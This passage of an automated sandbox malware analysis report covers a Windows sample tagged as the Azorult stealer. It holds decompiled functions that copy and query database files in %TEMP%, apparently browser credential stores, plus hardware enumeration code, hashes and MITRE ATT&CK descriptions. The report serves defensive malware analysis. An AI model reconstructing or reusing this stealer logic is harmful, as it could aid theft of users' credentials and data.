				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				signed int _t53;
				WCHAR* _t73;
				intOrPtr* _t88;
				void* _t90;
				intOrPtr* _t92;
				intOrPtr* _t96;
				intOrPtr* _t120;
				intOrPtr* _t124;
				void* _t126;
				intOrPtr* _t128;
				void* _t130;
				intOrPtr* _t132;
				intOrPtr* _t138;
				void* _t140;
				void* _t146;
				intOrPtr _t166;
				intOrPtr _t168;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr _t180;
				void* _t181;
				void* _t182;

				_t177 = __esi;
				_t145 = __ebx;
				_t53 = __eax | 0x5500000a;
				_t179 = _t180;
				_t146 = 9;
				do {
					_push(0);
					_push(0);
					_t146 = _t146 - 1;
					_t185 = _t146;
				} while (_t146 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t53;
				E00404150( &_v8);
				_push(_t179);
				_push(0x411282);
				_push( *[fs:eax]);
				 *[fs:eax] = _t180;
				E00403BDC( &_v28);
				_push(_t179);
				_push(0x411212);
				_push( *[fs:eax]);
				 *[fs:eax] = _t180;
				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t185);
				_push(_v48);
				E00406FDC( &_v52, __ebx, __edi, __esi, _t185);
				_push(_v52);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t145,  &_v40, _t185);
				E004062FC(L"%TEMP%",  &_v60, _t185);
				_push(_v60);
				_push(E004112B8);
				_push(_v32);
				E00403E78();
				E004078D8(_v56, _t145,  &_v44, _t185);
				_t73 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t73, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404B58(_v64, _t145, _t146,  &_v36, _t177, _t185);
				E00403D88( &_v68, _v36);
				if(E0040776C(_v68, _t145, _t146) != 0) {
					_t88 =  *0x41b140; // 0x41ca20
					_t90 =  *((intOrPtr*)( *_t88))(E00403990(_v36),  &_v16);
					_t181 = _t180 + 8;
					__eflags = _t90;
					if(_t90 == 0) {
						_t120 =  *0x41b330; // 0x41c930
						_t124 =  *0x41b2d4; // 0x41ca28
						_t126 =  *((intOrPtr*)( *_t124))(_v16, E00403990( *_t120), 0xffffffff,  &_v20,  &_v24);
						_t182 = _t181 + 0x14;
						__eflags = _t126;
						if(_t126 == 0) {
							while(1) {
								_t128 =  *0x41b384; // 0x41ca2c
								_t130 =  *((intOrPtr*)( *_t128))(_v20);
								__eflags = _t130 - 0x64;
								if(_t130 != 0x64) {
									goto L10;
								}
								_t132 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v72,  *((intOrPtr*)( *_t132))(_v20, 0, _v28));
								_t138 =  *0x41b1dc; // 0x41ca30
								_t140 =  *((intOrPtr*)( *_t138))(_v20, 1, E004112C0, _v72);
								_t182 = _t182 + 0x10;
								E00403CF4( &_v76, _t140);
								_push(_v76);
								_push(E004112C8);
								E00403E78();
							}
						}
					}
					L10:
					_t92 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t92))(_v20);
					_t96 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t96))(_v16);
					_pop(_t166);
					 *[fs:eax] = _t166;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t175);
					 *[fs:eax] = _t175;
				}
				_pop(_t168);
				 *[fs:eax] = _t168;
				_push(E00411289);
				E00403BF4( &_v76, 3);
				E004034E4( &_v64);
				E00403BF4( &_v60, 6);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x00411030
0x00411030
0x00411030
0x00411035
0x00411037
0x0041103c
0x0041103c
0x0041103e
0x00411040
0x00411040
0x00411040
0x00411043
0x00411044
0x00411045
0x00411046
0x00411049
0x0041104f
0x00411056
0x00411057
0x0041105c
0x0041105f
0x00411065
0x0041106c
0x0041106d
0x00411072
0x00411075
0x00411080
0x00411085
0x0041108b
0x00411090
0x00411093
0x004110a0
0x004110ab
0x004110b8
0x004110bd
0x004110c0
0x004110c5
0x004110d0
0x004110db
0x004110e5
0x004110f4
0x004110ff
0x0041110a
0x00411115
0x00411124
0x00411140
0x00411147
0x00411149
0x0041114c
0x0041114e
0x0041115e
0x0041116f
0x00411176
0x00411178
0x0041117b
0x0041117d
0x004111d9
0x004111dd
0x004111e4
0x004111e7
0x004111ea
0x00000000
0x00000000
0x0041118a
0x0041119b
0x004111ae
0x004111b5
0x004111b7
0x004111bf
0x004111c4
0x004111c7
0x004111d4
0x004111d4
0x004111d9
0x0041117d
0x004111ec
0x004111f0
0x004111f7
0x004111fe
0x00411205
0x0041120a
0x0041120d
0x00411222
0x00411230
0x00411126
0x00411128
0x0041112b
0x0041112b
0x00411237
0x0041123a
0x0041123d
0x0041124a
0x00411252
0x0041125f
0x00411267
0x00411274
0x00411281

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 5fd39944ce94f9eb84f2dee8ddcbd91ace201591751bedb5e53dfda76a551d43
Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
Opcode Fuzzy Hash: 5fd39944ce94f9eb84f2dee8ddcbd91ace201591751bedb5e53dfda76a551d43
Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58

Uniqueness

Uniqueness Score: -1.00%

Function 00415D60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00415D60(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v140;
				char _v176;
				char _v180;
				void* _t23;
				intOrPtr _t30;
				intOrPtr* _t34;
				void* _t37;

				_v180 = 0;
				_t34 = __eax;
				_push(_t37);
				_push(0x415e07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37 + 0xffffff50;
				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesA");
				_v176 = 0xa8;
				_t23 = 0;
				while(1) {
					_push(0);
					_push( &_v176);
					_push(_t23);
					_push(0);
					if(_v8() == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push( *_t34);
					E00403748( &_v180, 0x80,  &_v140);
					_push(_v180);
					_push(E00415E40);
					E00403850();
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E00415E0E);
				return E004034E4( &_v180);
			}

0x00415d6e
0x00415d74
0x00415d78
0x00415d79
0x00415d7e
0x00415d81
0x00415d99
0x00415d9c
0x00415da8
0x00415ddc
0x00415ddc
0x00415de3
0x00415de4
0x00415de5
0x00415dec
0x00000000
0x00000000
0x00415dac
0x00415dad
0x00415dc0
0x00415dc5
0x00415dcb
0x00415dd7
0x00415dd7
0x00415df0
0x00415df3
0x00415df6
0x00415e06

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesA,00000000,00415E07,?,-00000001,?,?,?,00415F5F,Video Info,?,004160A8,?,GetRAM: ,?), ref: 00415D8E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D94

Strings

user32.dll, xrefs: 00415D89
EnumDisplayDevicesA, xrefs: 00415D84

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesA$user32.dll
API String ID: 2574300362-2278183399
Opcode ID: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
Instruction ID: 9dd9bdf3a8bde6cf78cd03fc344b6578603246f1cfb7de35a5983435c2d557c6
Opcode Fuzzy Hash: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
Instruction Fuzzy Hash: 3901A571A00708AEE7209F62CC41BDB77ADEBC5714F5180BAF508E2180DA785F408A69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E79C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E79C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t29;
				void* _t40;
				WCHAR* _t51;
				int _t54;
				void* _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t73;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t59 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00403980(_v12);
				_push(_t77);
				_push(0x40e89b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_t29 = E00403790(_v16);
				asm("cdq");
				_t78 = _t63 -  *0x41cac8; // 0x0
				if(_t78 != 0) {
					if(__eflags < 0) {
						goto L4;
					}
				} else {
					_t79 = _t29 -  *0x41cac4; // 0x0
					if(_t79 < 0) {
						L4:
						E00407228(_v8, _t59,  &_v16);
						_t40 = E00403790(_v16);
						_t80 = _t40;
						if(_t40 == 0) {
							E004062FC(L"%TEMP%\\curbuf.dat",  &_v20, _t80);
							_t51 = E00403D98(_v20);
							_t54 = CopyFileW(E00403D98(_v8), _t51, 0);
							_t81 = _t54;
							if(_t54 != 0) {
								E004062FC(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
								E00407228(_v24, _t59,  &_v16);
							}
						}
						E0040E6D4(_v16, _t59, _v12, _t73, _t74);
						E004062FC(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
						DeleteFileW(E00403D98(_v28));
					}
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0040E8A2);
				E00403BF4( &_v28, 3);
				E00403508( &_v16, 2);
				return E00403BDC( &_v8);
			}

0x0040e79c
0x0040e79c
0x0040e79c
0x0040e79c
0x0040e7a1
0x0040e7a2
0x0040e7a3
0x0040e7a4
0x0040e7a5
0x0040e7a6
0x0040e7a7
0x0040e7aa
0x0040e7b0
0x0040e7b8
0x0040e7bf
0x0040e7c0
0x0040e7c5
0x0040e7c8
0x0040e7ce
0x0040e7d3
0x0040e7d4
0x0040e7da
0x0040e7ea
0x00000000
0x00000000
0x0040e7dc
0x0040e7dc
0x0040e7e2
0x0040e7ec
0x0040e7f2
0x0040e7fa
0x0040e7ff
0x0040e801
0x0040e80d
0x0040e815
0x0040e824
0x0040e829
0x0040e82b
0x0040e835
0x0040e840
0x0040e840
0x0040e82b
0x0040e84b
0x0040e858
0x0040e866
0x0040e866
0x0040e7e2
0x0040e86d
0x0040e870
0x0040e873
0x0040e880
0x0040e88d
0x0040e89a

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
DeleteFileW.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866

Strings

%TEMP%\curbuf.dat, xrefs: 0040E808, 0040E830, 0040E853

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat
API String ID: 5292005-3767633259
Opcode ID: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
Opcode Fuzzy Hash: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040246C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040246C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t47;

				_t45 = _t47;
				_t42 = __edx;
				_t25 = __eax;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t45);
					_push("�^");
					_push( *[fs:edx]);
					 *[fs:edx] = _t47;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					if(E00402290(_t25, _t42) == 0) {
						_t39 = E00401F5C(_t42);
						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
							_t15 = _t42;
						}
						if(_t39 != 0) {
							E00402628(_t25, _t15, _t39);
							E004020EC(_t25);
						}
						_v8 = _t39;
					} else {
						_v8 = _t25;
					}
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E00402524);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x0040246d
0x00402473
0x00402475
0x0040247e
0x00402495
0x00402496
0x0040249b
0x0040249e
0x004024a8
0x004024aa
0x004024af
0x004024af
0x004024bf
0x004024cd
0x004024db
0x004024e0
0x004024e2
0x004024e2
0x004024e6
0x004024ed
0x004024f4
0x004024f4
0x004024f9
0x004024c1
0x004024c1
0x004024c1
0x004024fe
0x00402501
0x00402504
0x00402510
0x00402512
0x00402517
0x00000000
0x00402517
0x0040251c
0x00402489
0x0040248b
0x0040252c
0x0040252c

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Azorult

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 004186C4, Relevance: 102.6, APIs: 4, Strings: 54, Instructions: 1056
synchronizationCOMMON

Function 00417216, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Function 00417D84, Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 377
libraryloadernetworkCOMMON

Function 004065F0, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Function 00406BD8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
registryCOMMON

Function 0040A6AA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Function 00401870, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Function 004033F4, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Function 004033EC, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 004033F0, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 00406E68, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Function 00406E6C, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Function 004011E4, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34
memoryCOMMON

Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 004065E8, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Function 004065EC, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Function 00401464, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 004015B0, Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Function 00413F58, Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 496
fileCOMMON

Function 00415E40, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114
COMMON

Function 00412D6C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143
fileCOMMON

Function 00413030, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141
fileCOMMON

Function 00404C71, Relevance: 9.0, APIs: 6, Instructions: 41
threadCOMMON

Function 0041160C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196
fileCOMMON

Function 004119A8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145
fileCOMMON

Function 004119AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143
fileCOMMON

Function 0040A610, Relevance: 3.0, APIs: 2, Instructions: 33
encryptionCOMMON

Function 00404BA8, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Function 00407AF0, Relevance: .0, Instructions: 2
COMMON

Function 00405668, Relevance: 217.3, APIs: 62, Strings: 62, Instructions: 307
libraryloaderCOMMON

Function 00417820, Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269
libraryloaderCOMMON

Function 0040965C, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234
libraryloaderCOMMON

Function 00409664, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 230
libraryloaderCOMMON

Function 00409668, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228
libraryloaderCOMMON

Function 00416974, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213
sleepCOMMON

Function 00416978, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211
sleepCOMMON

Function 0041698C, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201
sleepCOMMON

Function 00407E8F, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98
libraryloaderCOMMON

Function 00407E90, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98
libraryloaderCOMMON

Function 00416290, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225
libraryloaderCOMMON

Function 00416288, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216
libraryloaderCOMMON